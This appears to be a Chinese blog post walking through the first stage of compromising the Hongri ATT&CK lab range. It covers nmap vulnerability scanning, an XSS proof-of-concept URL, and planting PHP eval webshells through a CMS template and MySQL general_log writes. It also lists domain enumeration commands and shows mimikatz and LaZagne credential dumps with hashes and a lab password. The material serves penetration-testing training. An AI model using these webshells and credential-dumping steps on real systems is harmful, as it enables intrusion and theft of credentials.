由浅入深的域渗透系列一（上）

重生信息安全

发布于 2020-06-04 17:47:12

1.3K0

发布于 2020-06-04 17:47:12

文章被收录于专栏：重生信息安全重生信息安全

注：本系列以红日安全的ATT&CK（一）靶场展开。

篇幅略长，阅读需耐心。

本章节涉及到的知识点

一、环境搭建

1.环境搭建 2.信息收集

二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集

一、环境搭建

设置vm2网卡（192.168.52.0）
设置vm1网卡（192.168.33.0）

网络拓扑图

前期打点 nmap扫描

root@kepler:~/桌面# nmap -sV -Pn 192.168.33.5 --script=vuln

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 14:30 CST
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan

NSE Timing: About 78.85% done; ETC: 14:33 (0:00:32 remaining)

Stats: 0:03:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan

NSE Timing: About 98.89% done; ETC: 14:33 (0:00:02 remaining)

Nmap scan report for 192.168.33.5

Host is up (0.00045s latency).

Not shown: 998 filtered ports

PORT     STATE SERVICE VERSION

/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)

| http-csrf: 

| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.33.5

|   Found the following possible CSRF vulnerabilities: 

|     

|     Path: http://192.168.33.5:80/

|     Form id: 

|     Form action: /l.php#bottom

|     

|     Path: http://192.168.33.5:80/l.php

|     Form id: 

|_    Form action: /l.php#bottom

|_http-dombased-xss: Couldn't find any DOM based XSS.

| http-enum: 

|   /phpinfo.php: Possible information file

|   /phpmyadmin/: phpMyAdmin

|   /phpMyAdmin/: phpMyAdmin

|_  /PHPMyAdmin/: phpMyAdmin

| http-phpself-xss: 

|   VULNERABLE:

|   Unsafe use of $_SERVER["PHP_SELF"] in PHP files

|     State: VULNERABLE (Exploitable)

|       PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.

|              

|     Extra information:

|       

|   Vulnerable files with proof of concept:

|     http://192.168.33.5/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E

|   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.33.5

|     References:

|       http://php.net/manual/en/reserved.variables.server.php

|_      https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45

| http-slowloris-check: 

|   VULNERABLE:

|   Slowloris DOS attack

|     State: LIKELY VULNERABLE

|     IDs:  CVE:CVE-2007-6750

|       Slowloris tries to keep many connections to the target web server open and hold

|       them open as long as possible.  It accomplishes this by opening connections to

|       the target web server and sending a partial request. By doing so, it starves

|       the http server's resources causing Denial Of Service.

|       

|     Disclosure date: 2009-09-17

|     References:

|       http://ha.ckers.org/slowloris/

|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750

| http-sql-injection: 

|   Possible sqli for queries:

|     http://192.168.33.5:80/l.php?act=Function%27%20OR%20sqlspider

|     http://192.168.33.5:80/l.php?act=phpinfo%27%20OR%20sqlspider

|     http://192.168.33.5:80/l.php?act=Function%27%20OR%20sqlspider

|     http://192.168.33.5:80/l.php?act=phpinfo%27%20OR%20sqlspider

|     http://192.168.33.5:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider

|     http://192.168.33.5:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider

|     http://192.168.33.5:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider

|   Possible sqli for forms:

|     Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:

|       host

|       port

|       login

|       funName

|     Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:

|       host

|       port

|       login

|_      funName

|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)

3306/tcp open  mysql   MySQL (unauthorized)

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

MAC Address: 00:0C:29:D7:7E:A2 (VMware)


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 250.55 seconds

在php探针页面下发现一个xss

http://192.168.33.5/l.php/'%22/%3E%3Cscript%3Ealert(1)%3C/script%3E

扫描目录

通过扫描发现了一个备份rar，beifen.rar

解压得到yxcms

试试访问路径

curl -i http://192.168.33.5/yxcms/

看到后台路径和账号密码

二、漏洞利用

后台GetShell

成功登陆到yxcms的后台

在模版下添加一句话木马，蚁剑连接

成功连接

Mysql写webshell

select '<?php eval($_POST[a]);?>' INTO OUTFILE 'C:/phpStudy/WWW/aa.php';

发现有安全模式

查看这个的值，为NULL不可读写

show global variables like '%secure%';

show variables like '%general%';查询全局日志变量配置

set global general_log=on; 开启日志

set global general_log_file='C:/phpStudy/WWW/web1.php'; 设置日志位置为网站目录

select '<?php @eval($_POST['aaa']);?>';

之后蚁剑去连接

三、内网信息收集

查看当前权限

whoami && whoami /priv

查看ip

ipconfig /all

通过这个看到存在域

查看系统信息

systeminfo

查看网络连接

netstat -ano

查看安装应用

wmic product get name,version

查看进程

tasklist /v
net start                          ------ 查看当前运行的服务

看到一些进程是域管理员启动的，可以窃取进程

查看远程连接信息

cmdkey /l

查看杀软

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

查看在线用户

quser

查看密码复杂策略

net accounts                       ------  查看本地密码策略
net accounts /domain               ------  查看域密码策略

查看当前系统版本

wmic OS get Caption,CSDVersion,OSArchitecture,Version

查看本机管理员

net localgroup administrators
net localgroup administrators /domain 登录本机的域管理员

查看当前登录域

net config workstation

查看域用户

net user /domain

查看域管理员的用户组

net group "domain admins" /domain

查看域控制器

net group "domain controllers" /domain

查看域机器

net group "domain computers" /domain

获取域控ip

ping -a owa.god.org

取密码

取本机密码有几种方式

从注册表里读取，从内存读取，读取浏览器保存的密码，读取vpn保存的密码，读取配置文件保存的密码

上传lazagne

lazagne.exe all

首先读取到ntlm hash的值

浏览器和vpn的密码

mimikatz读取密码如下：

　　privilege::debug

　　sekurlsa::logonpasswords

mimikatz # sekurlsa::logonpasswords


Authentication Id : 0 ; 1957949 (00000000:001de03d)

Session           : Interactive from 1

User Name         : Administrator

Domain            : GOD

Logon Server      : OWA

Logon Time        : 2020/5/14 21:42:51

SID               : S-1-5-21-2952760202-1353902439-2381784089-500

        msv :

         [00000003] Primary

         * Username : Administrator

         * Domain   : GOD

         * NTLM     : 85c1491a3c765c7ae64f73dd12b2c005

         * SHA1     : b94ef91fcca7e093910779ddb25cd7189b330037

        tspkg :

         * Username : Administrator

         * Domain   : GOD

         * Password : hongrisec@2019:

        wdigest :

         * Username : Administrator

         * Domain   : GOD

         * Password : hongrisec@2019:

        kerberos :

         * Username : Administrator

         * Domain   : GOD.ORG

         * Password : hongrisec@2019:

        ssp :

        credman :


Authentication Id : 0 ; 997 (00000000:000003e5)

Session           : Service from 0

User Name         : LOCAL SERVICE

Domain            : NT AUTHORITY

Logon Server      : (null)

Logon Time        : 2020/5/14 21:34:40

SID               : S-1-5-19

        msv :

        tspkg :

        wdigest :

         * Username : (null)

         * Domain   : (null)

         * Password : (null)

        kerberos :

         * Username : (null)

         * Domain   : (null)

         * Password : (null)

        ssp :

        credman :


Authentication Id : 0 ; 996 (00000000:000003e4)

Session           : Service from 0

User Name         : STU1$

Domain            : GOD

Logon Server      : (null)

Logon Time        : 2020/5/14 21:34:39

SID               : S-1-5-20

        msv :

         [00000003] Primary

         * Username : STU1$

         * Domain   : GOD

         * NTLM     : 31f4fed3bf6b625f10c3e98486edf58a

         * SHA1     : 21f629c16524d1bb00e8af538dd5d44a2bfe97dc

        tspkg :

        wdigest :

         * Username : STU1$

         * Domain   : GOD

         * Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70 

        kerberos :

         * Username : stu1$

         * Domain   : GOD.ORG

         * Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70 

        ssp :

        credman :


Authentication Id : 0 ; 52651 (00000000:0000cdab)

Session           : UndefinedLogonType from 0

User Name         : (null)

Domain            : (null)

Logon Server      : (null)

Logon Time        : 2020/5/14 21:34:39

SID               : 

        msv :

         [00000003] Primary

         * Username : STU1$

         * Domain   : GOD

         * NTLM     : 31f4fed3bf6b625f10c3e98486edf58a

         * SHA1     : 21f629c16524d1bb00e8af538dd5d44a2bfe97dc

        tspkg :

        wdigest :

        kerberos :

        ssp :

        credman :


Authentication Id : 0 ; 999 (00000000:000003e7)

Session           : UndefinedLogonType from 0

User Name         : STU1$

Domain            : GOD

Logon Server      : (null)

Logon Time        : 2020/5/14 21:34:39

SID               : S-1-5-18

        msv :

        tspkg :

        wdigest :

         * Username : STU1$

         * Domain   : GOD

         * Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70 

        kerberos :

         * Username : stu1$

         * Domain   : GOD.ORG

         * Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70 

        ssp :

        credman :